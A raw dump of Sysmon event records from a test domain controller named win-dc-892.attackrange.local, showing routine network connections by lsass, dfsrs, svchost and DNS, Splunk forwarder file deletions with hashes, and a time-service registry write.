AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53658-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010018Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.929{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53657-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x800000000000000010017Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.929{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53657-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x800000000000000010016Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.927{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53656-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x800000000000000010015Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.927{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53656-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x800000000000000010014Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.915{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53655-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 
354300x800000000000000010013Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.915{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53655-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010012Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.509{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53654-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x800000000000000010011Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.509{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53654-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 23542300x800000000000000010035Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:17.840{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59822D24B8C2F959B58B09BD7A45242E,SHA256=FD9663F96104F399AD2B61424EB893FB087F6D14F50A9493B1C69F8A3CB9D82F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010036Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:18.871{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F42AE135EFED06B18EDDE6C81FA20C67,SHA256=274DCAE6DC4E9ABA4D10D6DCD22AEF7B50536B4418A12A37FA9DF361E45CE0B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010038Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:19.933{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDADB0399BF1C9F48867E7907ED64F68,SHA256=16F1AF4DB1EEC84EEAC4745697873E61FB6BE0CD479E6859D361E24F04C2E67B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010037Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:18.446{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53666-false10.0.1.12-8000- 23542300x800000000000000010039Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:20.980{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C217AF914387983FBD0D5F06E05E1D0,SHA256=9E9F751EDA39F32119039156BB1F526BE396D655DB98C774F7B2437F730E05F0,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000010040Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:06:21.308{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72626-0x43753235) 
23542300x800000000000000010041Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:22.105{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2C02CA0A4755B55A81D74ACC8648744,SHA256=64153973ECA88E38A1A368025F1FA0077712793CD9AE8229E22849F79D7A1B29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010042Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:23.136{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FB3C2557128140939CF851C6B2FC77D,SHA256=E2DC7CFB9B331BF397FC38984B407436A022F72444DB235A18345FFA5D674888,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010044Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:23.602{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53667-false10.0.1.12-8000- 23542300x800000000000000010043Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:24.151{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8090224AC1BB810842AFD700065AD9DC,SHA256=FF52F85C80C543A55BCB8BE93B36403C01F755D38834B1878965BA740BCBC3BC,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000010045Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:25.229{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2964A1D5C9F2A4BF58E28F494A63C254,SHA256=CA74A6FBA16F8C823D055398B8E765A4519D5D17BF3BE6BB0D626E8AE8CAB75D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010046Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:26.291{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B9B81C8600B38DA0E0883C79DE77F47,SHA256=99735FC14470908F7FE65A8AC24BDB5380C719FE0DC80E0D8D91DD65B783DD8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010047Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:27.290{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7EA6F0A0C59E70DF70476EBA690E1E6,SHA256=E4AA267B692C50E6BF65B1690F8150C9AD6135474C2EA2B6371239101A9CA0CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010048Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:28.306{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F8A3737E66A8CB38829240BC4A1DB10,SHA256=AD87376CB4939BED22F06F88E2239B6C5F9311B8EE5E1D5AFC5186297F5DFA69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010051Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:29.758{266CAFBE-646A-6064-0B00-00000000AE01}856NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnsMD5=2313D5E228884E38771C53923B0754D9,SHA256=E529C5BC81C8B303489DDB297E5CD96210622B68E3CF428B20DFC94D02FEDB1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010050Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:29.758{266CAFBE-646A-6064-0B00-00000000AE01}856NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnbMD5=A9A4FAF5A3E25EF77F35D927530EF9BA,SHA256=35323F1BAD6DBDAB187D1143D8E1A3489E6635A09DFC78BC2244B12927865591,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010049Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:29.337{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=895BAB5982FA224797B2A80CB445E9F6,SHA256=B8E1EDA95A5494B929C34BAAC261934126BB89102FA10942C10E82B2BF0934E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010055Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:30.774{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AD1B69D2A7563846DA5258F220E87FF2,SHA256=5C93703A25BAC76EBD45731A98181C3B5E55A5B6B87792B860B0870ABE146A93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010054Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:30.774{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3A8F35FB1853726D2A7285DCC9C44DAE,SHA256=DF89B85D1415DC4525AD7C8137C3313F0CF29A139326B4B4B7C938D54285AD16,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010053Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:29.540{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53668-false10.0.1.12-8000- 23542300x800000000000000010052Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:30.414{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD800368474603438F4E778BE8D887AE,SHA256=40327CF2BBE49A1A4B8532DB95BAB7CAC13E2300CFF80A9B190BCF2DC79A0E00,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000010063Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:30.148{266CAFBE-646A-6064-0B00-00000000AE01}856_ldap._tcp.DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 354300x800000000000000010062Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:30.142{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local57238- 354300x800000000000000010061Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:30.141{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local64494- 354300x800000000000000010060Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:30.135{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53670-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x800000000000000010059Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:30.135{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53670-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x800000000000000010058Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:30.134{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53669-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x800000000000000010057Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:30.134{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53669-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 
23542300x800000000000000010056Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:31.430{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35728F4758D009F42268AD0791BA28A3,SHA256=32DA6F5C780337D6F6CEC3B1A2722B2A99810BFDDF747879D1B03AA224BF33FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010064Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:32.445{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7481CE6585D6FD529B599BB2B7531675,SHA256=3C575887D4BA28CE46585645070FC1A020CD29ABA1D75A7DAD7CFEA55F9B07FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010065Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:33.460{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4F27CBE5B863D89E7CF92B87039F53C,SHA256=7E93A929927F5E140AE329B2F657825768CCE64A24D9834565920FD0242D1280,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010066Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:34.476{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBF41415D77786828F20B3512663A592,SHA256=C9C606733FE1F4B5808B5A0A03CF0E5A89A1B2F804423D609AF83797F84DBF75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010067Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:35.491{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2F867AAB33083A8FF1BE598C90BB0B2,SHA256=0EB1959A455A21F60D93CB894597598A638AA4752D654B79C8D6864EAA063BD7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010069Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:35.493{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53671-false10.0.1.12-8000- 23542300x800000000000000010068Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:36.506{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C105EAA788B9CF5641F000E3DD0BDF7A,SHA256=E5736FD84A42F2D15F8C8AD4E6ABBA6B65B8220FCA276E91E01334D099CC0E34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010070Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:37.522{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DF279185DB22B2EF2B7E05EBDFF4F8A,SHA256=2C0DBA9412904B559934825D651B885F3CD0EDA6B4D147B9478D90F4EBB40B35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010071Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:38.537{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB5FE0B0F5BA5E987716DA3A7484C9F1,SHA256=D0AB6934A873F29D7737CADE9F0676F72F3B9C039E5CFE5F4C213E88FCE02AEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010072Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:39.552{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A83756C01C137F3879C6F94A2D92238E,SHA256=C0F8DB699BDAD1BFE501923D546AEAFD5E8558CD1F8C1A7756E4C9EFF2ED8B09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010073Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:40.568{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D9ABD666D60C27F9A73B24F4597A550,SHA256=477B52569E16A536DC768F7FB77F8DEBEBA96667E043347689C4ACC176212404,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010074Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:41.583{266CAFBE-64FC-6064-1001-00000000AE01}6660NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9952998A14850DA36013F11D3DDCA064,SHA256=E0B26C40AE89AA800BACE282ABBAA62EF333413AE18D186D0CEDE76C96430A16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010076Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:42.598{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43BCBE34F2D09B89E8968B4D820D915E,SHA256=36C5573D4CD4C9B99D7B593441614D57312C1A64C0FACF82F725C55D8C1A1E37,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010075Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:40.633{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53672-false10.0.1.12-8000- 23542300x800000000000000010078Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:43.598{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E73F2C9F6EDE863116D0C43D24C8DFD,SHA256=90FEFD714B2D2EC4E2DDA104B3A4965DD260CD419D698FAB0905A1CACBA939B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010077Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:43.317{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C746AB578AC1A164E2078F657B69FD4C,SHA256=A39F231DCD698E64FCABCBEDDBEAE1284A24A56D18E0223791B847C9C319E5A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010081Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:44.613{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CEF0D3B09EF6B3B434016BF6D681176,SHA256=5BBC130BF983B564402E1AE1AD5F173AF1D5E7F9C122F71209D6BB84E38C1F97,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000010080Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:44.457{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat2021-03-31 12:00:44.752 23542300x800000000000000010079Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:44.457{266CAFBE-646C-6064-1100-00000000AE01}1200NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=2F6750572F4D9AB8D312C6AC6AB4E2B4,SHA256=2684CEDC46745BC97B4383266D133B3786AAFA551573444F848504D01F5FDA4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010082Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:45.644{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E89D020A174F8A636A7881E4DF752E7,SHA256=3C6D42A1B03BC53C89079AB9318E194DD3B91B5ACF879817BDB81A9E472245DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010083Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:46.722{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E02FA2416D964C09E5F3CBA8E614DF0D,SHA256=126141F9ABFF6F783DE7ADBC2D60F996D25EC3FAD75E171799FD9BEE1435AE7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010119Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 